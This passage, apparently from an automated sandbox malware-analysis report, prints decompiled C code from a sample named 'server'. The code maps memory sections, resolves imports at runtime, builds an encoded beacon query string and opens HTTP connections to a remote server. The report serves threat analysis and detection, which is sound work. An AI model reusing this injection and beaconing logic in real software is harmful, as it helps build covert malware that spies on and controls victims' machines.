                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00401418,0000000A,?,?), ref: 004015BD
                • CreateFileMappingW.KERNELBASE(000000FF,00404188,00000004,00000000,?,?), ref: 0040161D
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401634
                • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401648
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401660
                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A), ref: 00401669
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401671
                Memory Dump Source
                • Source File: 00000000.00000002.517264357.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.517264357.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.517264357.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.517264357.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView
                • String ID:
                • API String ID: 3812556954-0
                • Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
                • Instruction ID: e8584db34bd0864965919452e9e7a980232bfbaa31af8ac4f809374209f4ae08
                • Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
                • Instruction Fuzzy Hash: 1421C8B2500208BFD7119FA4DC84EAF3BACEB44355F14443AFA05F72E0D6758D458B68
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 72%
                			E0040110B(intOrPtr* __eax, void** _a4) {
                				int _v12;
                				void* _v16;
                				void* _v20;
                				void* _v24;
                				int _v28;
                				int _v32;
                				intOrPtr _v36;
                				int _v40;
                				int _v44;
                				void* _v48;
                				void* __esi;
                				long _t34;
                				void* _t39;
                				void* _t47;
                				intOrPtr* _t48;
                
                				_t48 = __eax;
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				_v24 =  *((intOrPtr*)(__eax + 4));
                				_v16 = 0;
                				_v12 = 0;
                				_v48 = 0x18;
                				_v44 = 0;
                				_v36 = 0x40;
                				_v40 = 0;
                				_v32 = 0;
                				_v28 = 0;
                				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                				if(_t34 < 0) {
                					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                				} else {
                					 *_t48 = _v16;
                					_t39 = E00401459(_t48,  &_v12); // executed
                					_t47 = _t39;
                					if(_t47 != 0) {
                						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                					} else {
                						memset(_v12, 0, _v24);
                						 *_a4 = _v12;
                					}
                				}
                				return _t47;
                			}

                APIs
                • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74CB4EE0,00000000,00000000,?), ref: 00401168
                  • Part of subcall function 00401459: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
                • memset.NTDLL ref: 0040118A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.517264357.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.517264357.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.517264357.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.517264357.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: Section$CreateViewmemset
                • String ID: @
                • API String ID: 2533685722-2766056989
                • Opcode ID: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
                • Instruction ID: 902b655066e6f1ef2c1749b59dddf7677aeeae3e3ffa194d207bc0e2506ab0da
                • Opcode Fuzzy Hash: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
                • Instruction Fuzzy Hash: 38214DB1D00209AFDB10DFA9C8809EEFBB9FF48314F10453AE616F7250D734AA048B64
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00401000(void* __edi, intOrPtr _a4) {
                				signed int _v8;
                				intOrPtr* _v12;
                				_Unknown_base(*)()** _v16;
                				signed int _v20;
                				signed short _v24;
                				struct HINSTANCE__* _v28;
                				intOrPtr _t43;
                				intOrPtr* _t45;
                				intOrPtr _t46;
                				struct HINSTANCE__* _t47;
                				intOrPtr* _t49;
                				intOrPtr _t50;
                				signed short _t51;
                				_Unknown_base(*)()* _t53;
                				CHAR* _t54;
                				_Unknown_base(*)()* _t55;
                				void* _t58;
                				signed int _t59;
                				_Unknown_base(*)()* _t60;
                				intOrPtr _t61;
                				intOrPtr _t65;
                				signed int _t68;
                				void* _t69;
                				CHAR* _t71;
                				signed short* _t73;
                
                				_t69 = __edi;
                				_v20 = _v20 & 0x00000000;
                				_t59 =  *0x404180;
                				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x18bad598));
                				if(_t43 != 0) {
                					_t45 = _t43 + __edi;
                					_v12 = _t45;
                					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                					if(_t46 != 0) {
                						while(1) {
                							_t71 = _t46 + _t69;
                							_t47 = LoadLibraryA(_t71); // executed
                							_v28 = _t47;
                							if(_t47 == 0) {
                								break;
                							}
                							_v24 = _v24 & 0x00000000;
                							 *_t71 = _t59 - 0x43175ac3;
                							_t49 = _v12;
                							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                							_t50 =  *_t49;
                							if(_t50 != 0) {
                								L6:
                								_t73 = _t50 + _t69;
                								_v16 = _t61 + _t69;
                								while(1) {
                									_t51 =  *_t73;
                									if(_t51 == 0) {
                										break;
                									}
                									if(__eflags < 0) {
                										__eflags = _t51 - _t69;
                										if(_t51 < _t69) {
                											L12:
                											_t21 =  &_v8;
                											 *_t21 = _v8 & 0x00000000;
                											__eflags =  *_t21;
                											_v24 =  *_t73 & 0x0000ffff;
                										} else {
                											_t65 = _a4;
                											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                												goto L12;
                											} else {
                												goto L11;
                											}
                										}
                									} else {
                										_t51 = _t51 + _t69;
                										L11:
                										_v8 = _t51;
                									}
                									_t53 = _v8;
                									__eflags = _t53;
                									if(_t53 == 0) {
                										_t54 = _v24 & 0x0000ffff;
                									} else {
                										_t54 = _t53 + 2;
                									}
                									_t55 = GetProcAddress(_v28, _t54);
                									__eflags = _t55;
                									if(__eflags == 0) {
                										_v20 = _t59 - 0x43175a44;
                									} else {
                										_t68 = _v8;
                										__eflags = _t68;
                										if(_t68 != 0) {
                											 *_t68 = _t59 - 0x43175ac3;
                										}
                										 *_v16 = _t55;
                										_t58 = _t59 * 4 - 0xc5d6b08;
                										_t73 = _t73 + _t58;
                										_t32 =  &_v16;
                										 *_t32 = _v16 + _t58;
                										__eflags =  *_t32;
                										continue;
                									}
                									goto L23;
                								}
                							} else {
                								_t50 = _t61;
                								if(_t61 != 0) {
                									goto L6;
                								}
                							}
                							L23:
                							_v12 = _v12 + 0x14;
                							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                							if(_t46 != 0) {
                								continue;
                							} else {
                							}
                							L26:
                							goto L27;
                						}
                						_t60 = _t59 + 0xbce8a5bb;
                						__eflags = _t60;
                						_v20 = _t60;
                						goto L26;
                					}
                				}
                				L27:
                				return _v20;
                			}

                APIs
                • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401038
                • GetProcAddress.KERNEL32(?,00000000), ref: 004010AA
                Memory Dump Source
                • Source File: 00000000.00000002.517264357.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.517264357.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.517264357.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.517264357.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID:
                • API String ID: 2574300362-0
                • Opcode ID: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
                • Instruction ID: 069ebb05316bb06cd12a0d66d81b5033da0b120a8bf666a49d589dbfec54084e
                • Opcode Fuzzy Hash: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
                • Instruction Fuzzy Hash: 65314975E0020ADFDB14CF59C980AAAB7F4BF04301B24407AD981FB7A0E779DA81CB58
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E00401459(void** __esi, PVOID* _a4) {
                				long _v8;
                				void* _v12;
                				void* _v16;
                				long _t13;
                
                				_v16 = 0;
                				asm("stosd");
                				_v8 = 0;
                				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                				if(_t13 < 0) {
                					_push(_t13);
                					return __esi[6]();
                				}
                				return 0;
                			}

                APIs
                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
                Memory Dump Source
                • Source File: 00000000.00000002.517264357.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.517264357.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.517264357.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.517264357.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: SectionView
                • String ID:
                • API String ID: 1323581903-0
                • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                • Instruction ID: 2ffffb3a0e1fef12aabb3d262299a14fd526f72662b70b4f27343324966f1358
                • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                • Instruction Fuzzy Hash: E9F037B590020CFFDB11DFA5CC85CAFBBBDEB44354B10493AF552E50A0D6309E089B60
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 69%
                			E02223CE0(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
                				intOrPtr _v4;
                				intOrPtr _v8;
                				intOrPtr _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				void* _v48;
                				intOrPtr _v56;
                				void* __edi;
                				intOrPtr _t30;
                				intOrPtr _t33;
                				intOrPtr _t34;
                				intOrPtr _t35;
                				intOrPtr _t36;
                				intOrPtr _t37;
                				void* _t40;
                				intOrPtr _t41;
                				int _t44;
                				intOrPtr _t45;
                				int _t48;
                				void* _t49;
                				intOrPtr _t53;
                				intOrPtr _t59;
                				intOrPtr _t63;
                				intOrPtr* _t65;
                				void* _t66;
                				intOrPtr _t71;
                				intOrPtr _t77;
                				intOrPtr _t80;
                				intOrPtr _t83;
                				int _t86;
                				intOrPtr _t88;
                				int _t91;
                				intOrPtr _t93;
                				int _t96;
                				void* _t98;
                				void* _t99;
                				void* _t103;
                				void* _t105;
                				void* _t106;
                				intOrPtr _t107;
                				long _t109;
                				intOrPtr* _t110;
                				intOrPtr* _t111;
                				long _t112;
                				int _t113;
                				void* _t114;
                				void* _t115;
                				void* _t116;
                				void* _t119;
                				void* _t120;
                				void* _t122;
                				void* _t123;
                
                				_t103 = __edx;
                				_t99 = __ecx;
                				_t120 =  &_v16;
                				_t112 = __eax;
                				_t30 =  *0x222a3e0; // 0x2bd9c20
                				_v4 = _t30;
                				_v8 = 8;
                				_t98 = RtlAllocateHeap( *0x222a2d8, 0, 0x800);
                				if(_t98 != 0) {
                					if(_t112 == 0) {
                						_t112 = GetTickCount();
                					}
                					_t33 =  *0x222a018; // 0x258be91c
                					asm("bswap eax");
                					_t34 =  *0x222a014; // 0x3a87c8cd
                					asm("bswap eax");
                					_t35 =  *0x222a010; // 0xd8d2f808
                					asm("bswap eax");
                					_t36 = E0222A00C; // 0xeec43f25
                					asm("bswap eax");
                					_t37 =  *0x222a348; // 0x9ad5a8
                					_t3 = _t37 + 0x222b5ac; // 0x74666f73
                					_t113 = wsprintfA(_t98, _t3, 2, 0x3d18f, _t36, _t35, _t34, _t33,  *0x222a02c,  *0x222a004, _t112);
                					_t40 = E0222467F();
                					_t41 =  *0x222a348; // 0x9ad5a8
                					_t4 = _t41 + 0x222b575; // 0x74707526
                					_t44 = wsprintfA(_t113 + _t98, _t4, _t40);
                					_t122 = _t120 + 0x38;
                					_t114 = _t113 + _t44;
                					if(_a12 != 0) {
                						_t93 =  *0x222a348; // 0x9ad5a8
                						_t8 = _t93 + 0x222b508; // 0x732526
                						_t96 = wsprintfA(_t114 + _t98, _t8, _a12);
                						_t122 = _t122 + 0xc;
                						_t114 = _t114 + _t96;
                					}
                					_t45 =  *0x222a348; // 0x9ad5a8
                					_t10 = _t45 + 0x222b246; // 0x74636126
                					_t48 = wsprintfA(_t114 + _t98, _t10, 0);
                					_t123 = _t122 + 0xc;
                					_t115 = _t114 + _t48; // executed
                					_t49 = E0222472F(_t99); // executed
                					_t105 = _t49;
                					if(_t105 != 0) {
                						_t88 =  *0x222a348; // 0x9ad5a8
                						_t12 = _t88 + 0x222b8d0; // 0x736e6426
                						_t91 = wsprintfA(_t115 + _t98, _t12, _t105);
                						_t123 = _t123 + 0xc;
                						_t115 = _t115 + _t91;
                						HeapFree( *0x222a2d8, 0, _t105);
                					}
                					_t106 = E02221340();
                					if(_t106 != 0) {
                						_t83 =  *0x222a348; // 0x9ad5a8
                						_t14 = _t83 + 0x222b8c5; // 0x6f687726
                						_t86 = wsprintfA(_t115 + _t98, _t14, _t106);
                						_t123 = _t123 + 0xc;
                						_t115 = _t115 + _t86;
                						HeapFree( *0x222a2d8, 0, _t106);
                					}
                					_t107 =  *0x222a3cc; // 0x2bd9600
                					_a20 = E02226B59(0x222a00a, _t107 + 4);
                					_t53 =  *0x222a36c; // 0x2bd95b0
                					_t109 = 0;
                					if(_t53 != 0) {
                						_t80 =  *0x222a348; // 0x9ad5a8
                						_t17 = _t80 + 0x222b8be; // 0x3d736f26
                						wsprintfA(_t115 + _t98, _t17, _t53);
                					}
                					if(_a20 != _t109) {
                						_t116 = RtlAllocateHeap( *0x222a2d8, _t109, 0x800);
                						if(_t116 != _t109) {
                							E02222915(GetTickCount());
                							_t59 =  *0x222a3cc; // 0x2bd9600
                							__imp__(_t59 + 0x40);
                							asm("lock xadd [eax], ecx");
                							_t63 =  *0x222a3cc; // 0x2bd9600
                							__imp__(_t63 + 0x40);
                							_t65 =  *0x222a3cc; // 0x2bd9600
                							_t66 = E02226675(1, _t103, _t98,  *_t65); // executed
                							_t119 = _t66;
                							asm("lock xadd [eax], ecx");
                							if(_t119 != _t109) {
                								StrTrimA(_t119, 0x2229280);
                								_push(_t119);
                								_t71 = E02227563();
                								_v20 = _t71;
                								if(_t71 != _t109) {
                									_t110 = __imp__;
                									 *_t110(_t119, _v8);
                									 *_t110(_t116, _v8);
                									_t111 = __imp__;
                									 *_t111(_t116, _v32);
                									 *_t111(_t116, _t119);
                									_t77 = E022221A6(0xffffffffffffffff, _t116, _v28, _v24); // executed
                									_v56 = _t77;
                									if(_t77 != 0 && _t77 != 0x10d2) {
                										E022263F6();
                									}
                									HeapFree( *0x222a2d8, 0, _v48);
                									_t109 = 0;
                								}
                								HeapFree( *0x222a2d8, _t109, _t119);
                							}
                							RtlFreeHeap( *0x222a2d8, _t109, _t116); // executed
                						}
                						HeapFree( *0x222a2d8, _t109, _a12);
                					}
                					RtlFreeHeap( *0x222a2d8, _t109, _t98); // executed
                				}
                				return _v16;
                			}

                APIs
                • RtlAllocateHeap.NTDLL ref: 02223D08
                • GetTickCount.KERNEL32 ref: 02223D1C
                • wsprintfA.USER32 ref: 02223D6B
                • wsprintfA.USER32 ref: 02223D88
                • wsprintfA.USER32 ref: 02223DA9
                • wsprintfA.USER32 ref: 02223DC1
                • wsprintfA.USER32 ref: 02223DE4
                • HeapFree.KERNEL32(00000000,00000000), ref: 02223DF4
                • wsprintfA.USER32 ref: 02223E16
                • HeapFree.KERNEL32(00000000,00000000), ref: 02223E26
                • wsprintfA.USER32 ref: 02223E5E
                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02223E79
                • GetTickCount.KERNEL32 ref: 02223E89
                • RtlEnterCriticalSection.NTDLL(02BD95C0), ref: 02223E9D
                • RtlLeaveCriticalSection.NTDLL(02BD95C0), ref: 02223EBB
                  • Part of subcall function 02226675: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,7491C740,02223ECE,00000000,02BD9600), ref: 022266A0
                  • Part of subcall function 02226675: lstrlen.KERNEL32(00000000,?,7491C740,02223ECE,00000000,02BD9600), ref: 022266A8
                  • Part of subcall function 02226675: strcpy.NTDLL ref: 022266BF
                  • Part of subcall function 02226675: lstrcat.KERNEL32(00000000,00000000), ref: 022266CA
                  • Part of subcall function 02226675: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02223ECE,?,7491C740,02223ECE,00000000,02BD9600), ref: 022266E7
                • StrTrimA.SHLWAPI(00000000,02229280,00000000,02BD9600), ref: 02223EED
                  • Part of subcall function 02227563: lstrlen.KERNEL32(02BD9C10,00000000,00000000,00000000,02223EF9,00000000), ref: 02227573
                  • Part of subcall function 02227563: lstrlen.KERNEL32(?), ref: 0222757B
                  • Part of subcall function 02227563: lstrcpy.KERNEL32(00000000,02BD9C10), ref: 0222758F
                  • Part of subcall function 02227563: lstrcat.KERNEL32(00000000,?), ref: 0222759A
                • lstrcpy.KERNEL32(00000000,?), ref: 02223F0C
                • lstrcpy.KERNEL32(00000000,?), ref: 02223F13
                • lstrcat.KERNEL32(00000000,?), ref: 02223F20
                • lstrcat.KERNEL32(00000000,00000000), ref: 02223F24
                  • Part of subcall function 022221A6: WaitForSingleObject.KERNEL32(00000000,74CF81D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02222258
                • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 02223F54
                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02223F64
                • RtlFreeHeap.NTDLL(00000000,00000000,00000000,02BD9600), ref: 02223F72
                • HeapFree.KERNEL32(00000000,?), ref: 02223F83
                • RtlFreeHeap.NTDLL(00000000,00000000), ref: 02223F91
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$AllocateCountCriticalSectionTickTrim$EnterLeaveObjectSingleWaitstrcpy
                • String ID:
                • API String ID: 186568778-0
                • Opcode ID: b0bfa2cfdae719420f26e83ec9e07d08310fbf02d201a566fb003669c7995084
                • Instruction ID: 368f13e3994a770c69079c44713d8c565356ca9248c358b6918d0e5dae7151a4
                • Opcode Fuzzy Hash: b0bfa2cfdae719420f26e83ec9e07d08310fbf02d201a566fb003669c7995084
                • Instruction Fuzzy Hash: 2F71BF31840215BFC731EBE4FC4CE963BE9EB88700B161A15F909D7220DA379A6CDB61
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 92%
                			E02227B83(void* __eax, void* __ecx, long __esi, char* _a4) {
                				void _v8;
                				long _v12;
                				void _v16;
                				void* _t34;
                				void* _t38;
                				void* _t40;
                				char* _t56;
                				long _t57;
                				void* _t58;
                				intOrPtr _t59;
                				long _t65;
                
                				_t65 = __esi;
                				_t58 = __ecx;
                				_v16 = 0xea60;
                				__imp__( *(__esi + 4));
                				_v12 = __eax + __eax;
                				_t56 = E022233DC(__eax + __eax + 1);
                				if(_t56 != 0) {
                					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
                						E022261DA(_t56);
                					} else {
                						E022261DA( *(__esi + 4));
                						 *(__esi + 4) = _t56;
                					}
                				}
                				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
                				 *(_t65 + 0x10) = _t34;
                				if(_t34 == 0 || InternetSetStatusCallback(_t34, E02227B18) == 0xffffffff) {
                					L15:
                					return GetLastError();
                				} else {
                					ResetEvent( *(_t65 + 0x1c));
                					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
                					 *(_t65 + 0x14) = _t38;
                					if(_t38 != 0 || GetLastError() == 0x3e5 && E022216B2( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
                						_t59 =  *0x222a348; // 0x9ad5a8
                						_t15 = _t59 + 0x222b845; // 0x544547
                						_v8 = 0x84404000;
                						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
                						 *(_t65 + 0x18) = _t40;
                						if(_t40 == 0) {
                							goto L15;
                						}
                						_t57 = 4;
                						_v12 = _t57;
                						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
                							_v8 = _v8 | 0x00000100;
                							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
                						}
                						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
                							goto L15;
                						} else {
                							return 0;
                						}
                					} else {
                						goto L15;
                					}
                				}
                			}

                APIs
                • lstrlen.KERNEL32(?,00000008,74CB4D40), ref: 02227B95
                  • Part of subcall function 022233DC: RtlAllocateHeap.NTDLL(00000000,00000000,022262F6), ref: 022233E8
                • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 02227BB8
                • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 02227BE0
                • InternetSetStatusCallback.WININET(00000000,02227B18), ref: 02227BF7
                • ResetEvent.KERNEL32(?), ref: 02227C09
                • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 02227C1C
                • GetLastError.KERNEL32 ref: 02227C29
                • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 02227C6F
                • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 02227C8D
                • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 02227CAE
                • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 02227CBA
                • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 02227CCA
                • GetLastError.KERNEL32 ref: 02227CD4
                  • Part of subcall function 022261DA: RtlFreeHeap.NTDLL(00000000,00000000,02226383,00000000,?,00000000,00000000), ref: 022261E6
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                • String ID:
                • API String ID: 2290446683-0
                • Opcode ID: 0120bb947bf50629b0a1d8e667b0079b2f8137cb50797271430375d108b3796c
                • Instruction ID: 00bc165d04b4089a3104bf1ee082179cc540e8822ffdb4ce1b07f6b609021ae4
                • Opcode Fuzzy Hash: 0120bb947bf50629b0a1d8e667b0079b2f8137cb50797271430375d108b3796c
                • Instruction Fuzzy Hash: 76419D71910214BFEB319FE5DC4CE6BBBBDEB84704F101928F602E15A4E732A658CB20
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 51%
                			E02227FC5(long _a4, long _a8) {
                				signed int _v8;
                				intOrPtr _v16;
                				LONG* _v28;
                				long _v40;
                				long _v44;
                				long _v48;
                				CHAR* _v52;
                				long _v56;
                				CHAR* _v60;
                				long _v64;
                				signed int* _v68;
                				char _v72;
                				signed int _t76;
                				signed int _t80;
                				signed int _t81;
                				intOrPtr* _t82;
                				intOrPtr* _t83;
                				intOrPtr* _t85;
                				intOrPtr* _t90;
                				intOrPtr* _t95;
                				intOrPtr* _t98;
                				struct HINSTANCE__* _t99;
                				void* _t102;
                				intOrPtr* _t104;
                				void* _t115;
                				long _t116;
                				void _t125;
                				void* _t131;
                				signed short _t133;
                				struct HINSTANCE__* _t138;
                				signed int* _t139;
                
                				_t139 = _a4;
                				_v28 = _t139[2] + 0x2220000;
                				_t115 = _t139[3] + 0x2220000;
                				_t131 = _t139[4] + 0x2220000;
                				_v8 = _t139[7];
                				_v60 = _t139[1] + 0x2220000;
                				_v16 = _t139[5] + 0x2220000;
                				_v64 = _a8;
                				_v72 = 0x24;
                				_v68 = _t139;
                				_v56 = 0;
                				asm("stosd");
                				_v48 = 0;
                				_v44 = 0;
                				_v40 = 0;
                				if(( *_t139 & 0x00000001) == 0) {
                					_a8 =  &_v72;
                					RaiseException(0xc06d0057, 0, 1,  &_a8);
                					return 0;
                				}
                				_t138 =  *_v28;
                				_t76 = _a8 - _t115 >> 2 << 2;
                				_t133 =  *(_t131 + _t76);
                				_a4 = _t76;
                				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                				_v56 = _t80;
                				_t81 = _t133 + 0x2220002;
                				if(_t80 == 0) {
                					_t81 = _t133 & 0x0000ffff;
                				}
                				_v52 = _t81;
                				_t82 =  *0x222a1c0; // 0x0
                				_t116 = 0;
                				if(_t82 == 0) {
                					L6:
                					if(_t138 != 0) {
                						L18:
                						_t83 =  *0x222a1c0; // 0x0
                						_v48 = _t138;
                						if(_t83 != 0) {
                							_t116 =  *_t83(2,  &_v72);
                						}
                						if(_t116 != 0) {
                							L32:
                							 *_a8 = _t116;
                							L33:
                							_t85 =  *0x222a1c0; // 0x0
                							if(_t85 != 0) {
                								_v40 = _v40 & 0x00000000;
                								_v48 = _t138;
                								_v44 = _t116;
                								 *_t85(5,  &_v72);
                							}
                							return _t116;
                						} else {
                							if(_t139[5] == _t116 || _t139[7] == _t116) {
                								L27:
                								_t116 = GetProcAddress(_t138, _v52);
                								if(_t116 == 0) {
                									_v40 = GetLastError();
                									_t90 =  *0x222a1bc; // 0x0
                									if(_t90 != 0) {
                										_t116 =  *_t90(4,  &_v72);
                									}
                									if(_t116 == 0) {
                										_a4 =  &_v72;
                										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                										_t116 = _v44;
                									}
                								}
                								goto L32;
                							} else {
                								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                									_t116 =  *(_a4 + _v16);
                									if(_t116 != 0) {
                										goto L32;
                									}
                								}
                								goto L27;
                							}
                						}
                					}
                					_t98 =  *0x222a1c0; // 0x0
                					if(_t98 == 0) {
                						L9:
                						_t99 = LoadLibraryA(_v60); // executed
                						_t138 = _t99;
                						if(_t138 != 0) {
                							L13:
                							if(InterlockedExchange(_v28, _t138) == _t138) {
                								FreeLibrary(_t138);
                							} else {
                								if(_t139[6] != 0) {
                									_t102 = LocalAlloc(0x40, 8);
                									if(_t102 != 0) {
                										 *(_t102 + 4) = _t139;
                										_t125 =  *0x222a1b8; // 0x0
                										 *_t102 = _t125;
                										 *0x222a1b8 = _t102;
                									}
                								}
                							}
                							goto L18;
                						}
                						_v40 = GetLastError();
                						_t104 =  *0x222a1bc; // 0x0
                						if(_t104 == 0) {
                							L12:
                							_a8 =  &_v72;
                							RaiseException(0xc06d007e, 0, 1,  &_a8);
                							return _v44;
                						}
                						_t138 =  *_t104(3,  &_v72);
                						if(_t138 != 0) {
                							goto L13;
                						}
                						goto L12;
                					}
                					_t138 =  *_t98(1,  &_v72);
                					if(_t138 != 0) {
                						goto L13;
                					}
